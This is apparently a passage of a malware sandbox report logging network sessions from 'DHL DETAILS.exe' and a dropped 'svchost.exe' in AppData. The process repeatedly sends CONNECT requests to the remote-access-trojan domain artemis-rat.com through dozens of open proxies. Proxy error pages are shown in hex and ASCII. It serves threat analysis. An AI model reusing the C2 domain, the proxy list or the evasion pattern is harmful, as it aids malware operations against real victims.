Mar 9, 2024 13:14:19.844887018 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1512	192.168.2.5	53877	198.12.255.193	22785	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.484986067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.567560911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.567727089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.568625927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1513	192.168.2.5	54566	104.16.106.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.491338968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.645369053 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1514	192.168.2.5	49904	140.227.204.70	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.506524086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.839920044 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1515	192.168.2.5	54450	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.522171021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1516	192.168.2.5	54605	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.523777008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1517	192.168.2.5	54456	219.243.212.118	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.544459105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.882349968 CET	22	IN	HTTP/1.1 502 ERROR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1518	192.168.2.5	54442	138.36.199.14	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.544791937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1519	192.168.2.5	54455	153.19.91.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.546441078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.333125114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.333427906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.333359003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.239301920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.146692038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.146233082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1520	192.168.2.5	54438	5.44.42.115	58386	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.552732944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1521	192.168.2.5	53166	191.7.208.103	31576	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.552901983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1522	192.168.2.5	54569	38.162.23.127	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.556582928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.018096924 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1523	192.168.2.5	54572	94.131.60.199	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.562110901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1524	192.168.2.5	54346	94.131.59.241	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.604955912 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1525	192.168.2.5	54459	43.133.136.208	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.626740932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1526	192.168.2.5	54591	198.37.57.112	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.626979113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.858072996 CET	503	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Connection: close Content-Length: 324 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1527	192.168.2.5	54486	138.2.73.157	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.627448082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1528	192.168.2.5	54548	147.75.92.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.628784895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.906400919 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1529	192.168.2.5	49973	91.134.140.160	53012	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.629282951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224282980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833408117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.036649942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.520971060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.895567894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.270610094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146239996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1530	192.168.2.5	54542	13.37.89.201	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.631304026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.927459955 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1531	192.168.2.5	54533	172.104.251.179	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
